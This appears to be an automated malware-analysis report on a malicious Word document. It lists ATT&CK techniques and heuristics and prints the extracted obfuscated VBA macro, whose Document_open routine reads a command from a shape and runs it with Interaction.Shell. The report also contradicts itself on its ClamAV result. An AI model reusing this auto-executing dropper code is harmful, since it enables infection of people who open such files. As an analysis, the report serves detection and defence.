Verdict: MALICIOUS
Risk Score: 272
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions. Heuristics indicate suspicious calls to cmd.exe and references to PowerShell, suggesting the macro is designed to download and execute a second-stage payload. The obfuscated command line found in the document body further supports this, as it attempts to construct and run commands via cmd.exe.
Heuristics (9)

- ClamAV: Doc.Malware.Dkvn-6774448-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dkvn-6774448-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `End Select nSISYiuFN = Array(GvajSZvcb, HISHpDFa, iJqHIwtBz, Interaction.Shell(FksBGnR, oGtOZGOlUn), jEpISB) Select Case TbSljzKHduzpqwwTwpwtcpw`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7686 bytes |

SHA-256: 555dd5e86504f73fecefdecf8e0561699e7dc92a339c85052c798ce54aef1951

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 170 of 207 identifiers look randomly generated (e.g. 'oSGakhZaVnVibAcFhwGXJznR'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vVkjwkvSXMdL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case KWTsEMlMVaZrQjb
Case 278264801
izvNONSRSffpsvZMFIScoh = 15647715
dZpDVJBfWfhfttwIBamhFXd = 206232366
fLYJNAAuEjoYPwIdATNNuTMM = ChrB(63842020 / ChrB(177751005))
vVlGwJDpwdVIihkoJ = jlddEEDQRFMwLzm
Case 253397297
ZSdsOLGKzfLifJ = 197570628
FZplSRhCjrwdzR = 144590615
rdLWjOUaWSEZshmviv = ChrB(42136575 / ChrB(169369297))
BlIlaLWMdKhJprBwHXqFOOAM = 54965414
End Select
Select Case mHrLBDfNHKZkizaRurY
Case 108624003
ihAXNfboGuJQuQlXz = 182419928
LpfScCzEAKwlzIIEa = 284319200
oXDYAQQUjipuwPFFaDOXUQ = ChrB(183684735 / ChrB(179700084))
HIKIlMKjJnvHQiCMiNVL = CVtDhBLTTXvcusHGL
Case 328051264
iNmcKzKYMLlDGQOFmQ = 33881278
LwMqPAfWmuGWPz = 213215089
PtjFXczIiUoLfm = ChrB(137503372 / ChrB(272668079))
tLfBwMJRnmSEOnH = 235609349
End Select
Select Case MchIuIzcjNXSsMOYqUBkr
Case 96539383
fcoPPhcQVRoAVUsUSPjur = 84278183
KAwJwjMurztCfG = 298442159
vHwBAEMsEwAiULUrTaiPR = ChrB(156798172 / ChrB(205539298))
JXzDcSMNZhlmuLBGoFFwf = ZjdBjFcdQXcMscHIQlmm
Case 60204035
ZiwHYYbLShEfzQaajGlvQN = 62790960
SZzfoTLtUnGuFbhDCFEvI = 85860895
qiqCfBNVMYOowZwWwVLK = ChrB(69762384 / ChrB(64482578))
UIZhsLJNZFvIwwRfrHRu = 145237963
End Select
Select Case HBVspsGJVFUjvboDHGHnrj
Case 23462058
BACkpaCCGdNhQsGk = 72174928
vENabliwBpQiva = 327332961
rppWTuDSaSOGnPzW = ChrB(188715175 / ChrB(269299087))
wwbZRFsZMmbhmkFBQuoiA = vzIWYJmptBGpwO
Case 102386766
YQaVqfwkbWiNjboFk = 324995667
bQuhjmXsZbwlql = 1455998
XHfKPBYuCbYGSNAFBN = ChrB(263201967 / ChrB(2342905))
jriTnYJfkrciFQwEmlar = 340377348
End Select
Select Case wsSAnPirYCwIJILU
Case 27674233
PbpnDoPVONsGZOAuQkNw = 2954644
UGYkuipKIOHrwj = 153462502
pikSBQwRcjIOraHH = ChrB(201097770 / ChrB(94817110))
iOStljDFiziRTXH = iMhADHGHLWaShHzNiZouWkz
Case 252697716
LURuRprjfYvwODbIKiPFlXXz = 139375500
tiMYwMvCsnoNtjjjBiDQU = 150303661
mLCkjMnzSZiwIWHa = ChrB(230187050 / ChrB(7533799))
KoTzoiWBVowEPWVa = 82113668
End Select
Select Case GjkcjJGkizMkDwUvNnwLcSup
Case 110246937
JLHthdMEvoftDW = 159273060
jUNhBNmJKdoKWnovLizvco = 119858129
YzCfQUkZnqmabjDwZwiEo = ChrB(10323525 / ChrB(227213303))
zjhYXdJrCiICLGt = sPWfBOTcbCViFOvXQtjjmM
Case 9983647
juXzbBlTEsLYiCGl = 106851655
wUHfloillRaMDjO = 82052267
GqWBaRCZMCWsOmuQjPjCAJjO = ChrB(275491132 / ChrB(104300877))
tspiKSCAvtEVDEFYlM = 293565433
End Select
Select Case KwHwiaEfohATsKm
Case 104249059
dOcmHaWEjDOUpbufLPrpwvfi = 277815298
QwpknJZbDMMUCVltz = 155618149
KwFFojuvaChiuwqJaOwPEv = ChrB(91474747 / ChrB(158912664))
SrMVDDwHsfSLqBEtNwZWd = YMLLiAIlPkhXVphZW
Case 336958522
aCQXwjNuVrwoCEATAKsZw = 339480927
QidTjOLncalCPHo = 83548506
RFmtTvfSUVhPiZobvAo = ChrB(140387022 / ChrB(107657462))
fKDUOQClMLzQIqNNzmzAL = 296859787
End Select
Set fwXQhJw = vVkjwkvSXMdL.Shapes(GHLKzJhXY + "zfrKdjSboliRsP" + aLmzWb).TextFrame
Select Case HiKkijXCWklCfhziW
Case 149790537
YzArjjfszznuDRAEJUoNmhI = 220025274
WDilKNNiRKUGqiECrZD = 226604202
hlicoNiJFroTQJdwHnlaMl = ChrB(47517525 / ChrB(209027198))
SqkKuHFzlpSEIWAfZMSjnZUa = kmRIdwdwdVXzzKk
Case 229997749
iULswRlumZozKsVJEK = 136346260
qItoFiAchZBhzTvAPNlVfN = 280890869
ozTcBnuzPudWbXnTQI = ChrB(84645488 / ChrB(84284751))
GCrzVuqZzIcRWzFLXbt = 204872700
End Select
FksBGnR = fwXQhJw.ContainingRange + pYZra + WAdwi + fjtDaQm + EXhHs + RIksvA + hWozBZ + QHulb + BPpTUTs + phwct + GjqnTW + RhGZXA
Select Case fZljNMOaHSoHVwD
Case 267035529
EKWsiBOQzwmDDYkrJl = 188158250
dFazdIXszsPwTk = 67724208
RMAXXSPOcWDtDQLL = ChrB(178054060 / ChrB(257679826))
wjZPViVRFipkSOYZzkEdKpM = HEdojhEVjsLcrzfsCB
Case 67846245
mlkifqNbWJhJXEHRBjhY = 197181894
EaDvhAEMbIfjhVTwIs = 128616246
zWKCFmpOrVUlBTjKbkJN = ChrB(148486435 / ChrB(66558280))
YdqXlzCXoFBUhPBquKqUG = 268141770
End Select
Select Case uftddbiHZfJJNdQqOziVDazN
Case 13756428
BHGdJzZhGTFSzSjvFKSaXi = 292483589
ZiVjuUffboZXAwV = 75915834
fXwkwALlIUpvbRTOzDbcp = ChrB(257859883 / ChrB(250242231))
aqIsLuJoGqsKvWdhJwlzqj = XGJAttjtrlJKFrTaOLApkZIT
Case 195440720
tSrBmzqrklCtPuXzAZm = 78216365
qqXXopuOwzpXTAQBqzL = 132187799
HhXVvGRnYjjRADcU = ChrB(196405634 / ChrB(330426758))
vcloMWwuHvJZbrL = 227789740
End Select
Select Case DQdzTNwYXTaNQpDtXSi
Case 68072353
DfdbUNlviGjJTHi = 143598335
qiSkhGPICiYLCzSB = 137308803
lzWzALctMrDwhVYIcErTWYNT = ChrB(114766104 / ChrB(230947217))
kbHQHwIwVrriHInu = EGwDntWOKBcMmChRwsR
Case 33191365
wwZYCRlZkLiipPLmJzi = 242112860
zzfjjoJNIPVpzH = 54676227
ikcloZpuiwnWipujUZ = ChrB(337036562 / ChrB(2466968))
oSccMcwNosHCPiMGzMXIkAn = 6839781
End Select
Select Case iUSTJnJAMhPRCmY
Case 128207520
oSGakhZaVnVibAcFhwGXJznR = 126465045
RiWmIiWmmzwfwnt = 298983547
AoVkjnLUpRwooioHcPuEji = ChrB(258150328 / ChrB(51234546))
OfHBwTdQMnczWlrKRSQawz = JYVXzpEVANwRHETrw
Case 119767122
crMKFiCtRMWhpQNwdd = 314533368
bHRbjaUkGwaRIbVbwOPt = 319748534
mIijGAuFqOCnwUZkafJSnTl = ChrB(32087036 / ChrB(163023046))
vmBPNCijUJzCTTpAH = 84957724
End Select
Const oGtOZGOlUn = 0
Select Case SEYBmYuaNhwjMOQOBlZP
Case 156548604
BUHzjEJLXOzWhArwdOdlcvq = 203906589
bnUrwPLGZDEtooqR = 12289836
ihqjPXDILmmQFdcl = ChrB(53612558 / ChrB(109889042))
UZznPHznEoZmTalIzVuYwn = DZTJzaRDjZdhkitaYRkzUl
Case 339806979
pUViQNsrjjvOwwAMml = 297710826
qtBZDuVGMoVSZAUd = 31446967
mThlBAnfiaRXNjsmdwSvbV = ChrB(289108276 / ChrB(246111297))
sOdowiXIAwafErBmXQup = 269850104
End Select
Select Case wvZOBHjwTtzHMiAPsKGqJ
Case 279396163
QXDTWZWCjXXwzQCavTanT = 338407096
UVjjpEXpYHOJqzoKZwqTk = 269384649
AwpkKXiDOQqjwnpjwJiw = ChrB(281888615 / ChrB(243921983))
McHJBqcfwfpikAT = SqEAszOqWjPsKCqo
Case 103923050
cHCNjMlltDIEFjiwPImkPNO = 110966259
SakVupAStXMKEJrOGFKiSd = 228772881
OmiCfbPtlaOmBQzO = ChrB(49775799 / ChrB(249857901))
JSlLwuWIHEiUosXG = 54171924
End Select
nSISYiuFN = Array(GvajSZvcb, HISHpDFa, iJqHIwtBz, Interaction.Shell(FksBGnR, oGtOZGOlUn), jEpISB)
Select Case TbSljzKHduzpqwwTwpwtcpw
Case 66845561
aoNXDcDURaWiKuXnLpY = 328768502
BWmjwJIFOdfHJGIwkZSwUZ = 148551518
pouYFRAXMlYSaqHSuOC = ChrB(319001623 / ChrB(283779887))
AnPqaPGBVczMrIOkzz = HvYhqVuRzBFWajSnGJOq
Case 242327559
KQvTNzwDKPETjacGY = 140698022
zGAPGZdYVIakHsqlIlXH = 309503405
vrqRGzsKAktJnKKApt = ChrB(237272249 / ChrB(175876657))
vjizbspUUBNliLIZoSij = 66372582
End Select
Select Case WrHjdZklUqGzuj
Case 92144109
sZizuwaIPkhAFEzOfYYXmv = 263927849
PVMDJHjVSXrsouGaRzT = 300639865
jfPqsRWHqzwlDjZjWwIDLii = ChrB(84332485 / ChrB(50245502))
lSwGnbuifpwMRpKNbXu = kKjruBLqjBzDjSj
Case 26697998
jMUqUDjmKjSswHLS = 3173047
alGMlQECistdzJGDrKZQPG = 325095745
kUszitllicGSCXa = ChrB(30806220 / ChrB(254855691))
ZrsjjJluPAskZTnBc = 114530693
End Select
Select Case dnujFVPwUPIAYZnzAsW
Case 189240235
dcOujTVsbBzLXftmQ = 229170596
UppqptWrjJbtLMFAK = 209220425
WCuEtOLoBuuKjJHIdolZBN = ChrB(185197347 / ChrB(253274092))
zImzRfiGiMMakwciEUzow = jDDcMYGkIaHVtGYokOLDFzv
Case 227632093
rJvwsizkHZivoTJAtDmSPCW = 34051183
kidullIVkUPLoQvKk = 250134298
qsvvCDMtJQconpjIwUpVn = ChrB(172246541 / ChrB(175368341))
zuoFnqIfQoOXpnb = 283150074
End Select
End Sub